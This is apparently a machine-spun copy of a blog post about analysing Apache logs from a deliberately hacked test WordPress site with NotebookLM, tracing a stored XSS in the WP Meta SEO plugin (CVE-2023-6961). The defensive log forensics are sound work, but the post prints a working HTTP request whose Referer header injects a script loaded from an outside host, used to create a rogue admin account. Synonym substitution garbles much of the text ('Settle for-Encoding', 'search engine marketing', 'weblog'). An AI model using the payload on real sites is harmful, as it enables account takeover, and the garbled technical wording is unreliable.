Analyzing WordPress Hack Access Logs With NotebookLM

Intro to NotebookLM

One of many instruments that I discovered just lately and I hold utilizing increasingly every day is NotebookLM from Google Labs. NotebookLM is a superb software for studying new matters, researching massive quantities of knowledge, summarizing knowledge. The information is organized into notebooks, every pocket book can include a number of sources of knowledge.You’ll be able to add knowledge in varied codecs (internet URLs, Slides, PDFs, textual content recordsdata, audio knowledge, YouTube movies, …) after which use the software to research them.

I often use it to ask questions in regards to the knowledge or summarize the info and/or extract items of data.Probably the most helpful characteristic for me is that if you ask a query it would present a solution with numbered hyperlinks to the sources so you may double examine if the reply is appropriate or not.

Right here, I’m opening the pocket book Introduction to NotebookLM and ask the query What’s the most variety of phrases a pocket book can include? and you’ll see that it answered with a hyperlink to the paragraph that lists the Supply limitations. (Every supply can include as much as 500,000 phrases.)

That’s very useful if you wish to verify if the reply you’ve acquired is grounded on fact or not.

A WordPress hack

A number of days in the past I had the concept of making an attempt to see if it’s potential to research WordPress logs with NotebookLM (or with LLMs basically). That occurred after a good friend’s weblog was hacked and I spent loads of time wanting on the logs making an attempt to make sense of them. I used to be pondering, there should be a neater manner to do that, LLMs are nice at analyzing structured knowledge.

So, I setup a check WordPress weblog, made it public on the web for a couple of days to get some background web noise logs (to make it as lifelike as potential). After which, I hacked my check weblog with the exploit my good friend’s weblog was hacked with (to breed the scenario). The exploit is CVE-2023-6961, it’s associated to the WordPress plugin WP Meta search engine marketing. The exploit is nicely described on this weblog publish from Fastly.

It is a saved XSS vulnerability by way of the Referer header, you ship an HTTP request with an XSS payload on the Referer header.

GET /index.php/2024/10/20/973498739847943/ HTTP/1.1
Referer: <script src=”https://media.cdnstaticjs.com/?payload=873933″></script>
Host: weblog.thx.bz
Settle for-Encoding: gzip, deflate, br
Settle for: */*
Settle for-Language: en-US;q=0.9,en;q=0.8
Person-Agent: Mozilla/5.0 (Home windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: shut
Cache-Management: max-age=0

When the administrator logs into the WP Admin dashboard and visits the WP Meta search engine marketing 404 & Redirects web page, the XSS payload will get executed. For the payload I’ve used some JS code that may create a brand new WP admin person much like what occurred in my good friend’s case.

If you’re to see the precise logs that I’ve uploaded into NotebookLM, yow will discover them on this Kaggle dataset.

Nice, now we now have the WordPress Hack Apache Entry logs. Let’s load them into NotebookLM and see what we are able to do with them.

What I’ve uploaded to NotebookLM is a file named apache_access_log.txt (because it solely accepts textual content recordsdata) that accommodates 1076 strains of entry logs logged over 3 days. It’s potential to add way more knowledge, the Gemini 1.5 Professional mannequin utilized by NotebookLM helps as much as 2 million tokens/phrases.

178.215.238.68 – – [19/Oct/2024:00:03:17 +0000] “GET /login.rsp HTTP/1.1” 404 453 “-” “Howdy World”
167.99.55.110 – – [19/Oct/2024:00:13:56 +0000] “POST /wp-cron.php?doing_wp_cron=1729469636.1745829582214355468750 HTTP/1.1” 200 259 “-” “WordPress/6.6.1; http://weblog.thx.bz”
143.110.222.166 – – [19/Oct/2024:00:13:55 +0000] “GET / HTTP/1.1” 200 15340 “-” “Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Model/16.1 Cellular/15E148 Safari/604.1”
162.158.154.86 – – [19/Oct/2024:01:03:12 +0000] “GET /wp-includes/certificates/plugins.php HTTP/1.1” 404 490 “-” “-”
172.70.115.200 – – [19/Oct/2024:01:03:12 +0000] “GET /wp-admin/person/plugins.php HTTP/1.1” 404 490 “-” “-”
172.70.230.7 – – [19/Oct/2024:01:03:12 +0000] “GET /.well-known/acme-challenge/plugins.php HTTP/1.1” 404 490 “-” “-”
172.70.230.7 – – [19/Oct/2024:01:03:12 +0000] “GET /.well-known/acme-challenge/plugins.php HTTP/1.1” 404 490 “-” “-”
162.158.158.139 – – [19/Oct/2024:01:03:12 +0000] “GET /wp-includes/customise/plugins.php HTTP/1.1” 404 490 “-” “-”
172.70.115.200 – – [19/Oct/2024:01:03:12 +0000] “GET /wp-includes/SimplePie/plugins.php HTTP/1.1” 404 489 “-” “-”
162.158.154.86 – – [19/Oct/2024:01:03:12 +0000] “GET /wp-admin/css/colours/blue/plugins.php HTTP/1.1” 404 489 “-” “-”
…
1076 strains of logs

Analyze WordPress logs with NotebookLM

Now that we now have the logs uploaded into NotebookLM, let’s attempt to analyze the info.Let’s begin with an “straightforward” query.

What’s the IP tackle of the WordPress administrator?

I’m asking what’s the IP tackle of the WordPress administrator to see if NotebookLM can perceive the info and extract some data from this knowledge:

Nice reply, not solely as a result of it accurately decided that IP tackle of the WP admin (80.97.26.93), however it additionally was in a position to determine that originally the person logged on as one other IP (138.199.53.226) after which switched to the ultimate one (80.97.26.93).

That’s fairly spectacular, I used to be curious to know the way it knew to correlate these two IP addresses.

So, I’ve requested subsequent:

How have you learnt that these 2 IP addresses (80.97.26.93 and 138.199.53.226) belong to the identical person?

Once more an excellent reply, it observed the An identical Person Agent and Sequential Exercise.That’s fairly helpful already. Let’s ask extra sophisticated questions, to attempt to establish what HTTP requests could possibly be associated with the creation of a brand new WP Admin account (that is what we all know occurred in my good friend’s case—a brand new WP person was created).

Checklist all of the IP addresses and logs that generated HTTP requests that might have resulted in a brand new WP admin person creation

Attention-grabbing. It discovered that our personal WP admin IP tackle was used to attempt to create a brand new WP admin person.That is fairly attention-grabbing because it sort of hints to a Saved XSS vulnerability.

The obvious manner our personal IP tackle could possibly be used to create a brand new admin person is that if we visited an administrative web page the place attacker JS code was injected and our personal person (from our personal IP tackle) executed the attacker’s injected code.

Let’s ask a extra sophisticated query making an attempt to pinpoint the WP plugin that was concerned within the exploit.

What WP plugin might have been exploited to create a brand new WP admin person?

I’ve additionally added the next extra data to the query to assist the LLM reply the query (as we already know what WP plugins we now have put in):

What WP plugin might have been exploited to create a brand new WP admin person?
Take into accounts the next identified info:
The next WordPress plugins are put in in my WordPress set up:
<wordpress_plugins_installed>
akismet
wp-fail2ban
wp-meta-seo
hey.php
</wordpress_plugins_installed>

I’ve mainly requested it to establish the WP plugin that might have been used to create a brand new WP admin person and offered an inventory of put in WP plugins.

Wow, it was in a position to establish the susceptible WP plugin (WP Meta search engine marketing) that was used in the course of the exploit.Not solely that however it was additionally in a position to establish the WP Meta search engine marketing admin web page the place the exploit occurred.

The reply accommodates the next part:

These makes an attempt originated from pages associated to the WP Meta search engine marketing plugin, particularly the “metaseo_broken_link” web page

metaseo_broken_link is the susceptible web page the place the XSS payload executed.

It quoted the next logs:

80.97.26.93 – – [21/Oct/2024:08:15:49 +0000] “GET /wp-admin/user-new.php HTTP/1.1” 200 10927 “http://weblog.thx.bz/wp-admin/admin.php?web page=metaseo_broken_link” “Mozilla/5.0 (Home windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0”
80.97.26.93 – – [21/Oct/2024:08:15:49 +0000] “POST /wp-admin/user-new.php HTTP/1.1” 302 459 “http://weblog.thx.bz/wp-admin/admin.php?web page=metaseo_broken_link” “Mozilla/5.0 (Home windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0”
80.97.26.93 – – [21/Oct/2024:08:15:49 +0000] “GET /wp-admin/customers.php?replace=add&id=2 HTTP/1.1” 200 12205 “http://weblog.thx.bz/wp-admin/admin.php?web page=metaseo_broken_link” “Mozilla/5.0 (Home windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0”

That’s nice. We see a POST /wp-admin/user-new.php that ends in a 302 (Success) that has a Referer of http://weblog.thx.bz/wp-admin/admin.php?web page=metaseo_broken_link.After which GET /wp-admin/customers.php?replace=add&id=2 we all know that the newly created WP person has id=2 (that’s appropriate).metaseo_broken_link is clearly the offender.

Let’s ask another query:

Please listing all of the log entries the place the Referrer header accommodates HTML code

It accurately recognized the request that I’ve used to inject the XSS payload that resulted within the Saved XSS vulnerability.

As you may see, utilizing NotebookLM helped us to shortly get an thought of how the WordPress weblog was compromised and which plugin was probably susceptible.After all, it doesn’t work as nicely every time, however it nonetheless can save loads of time.

If you’re within the patch for this vulnerability, it’s accessible right here (the Referrer header is HTML encoded).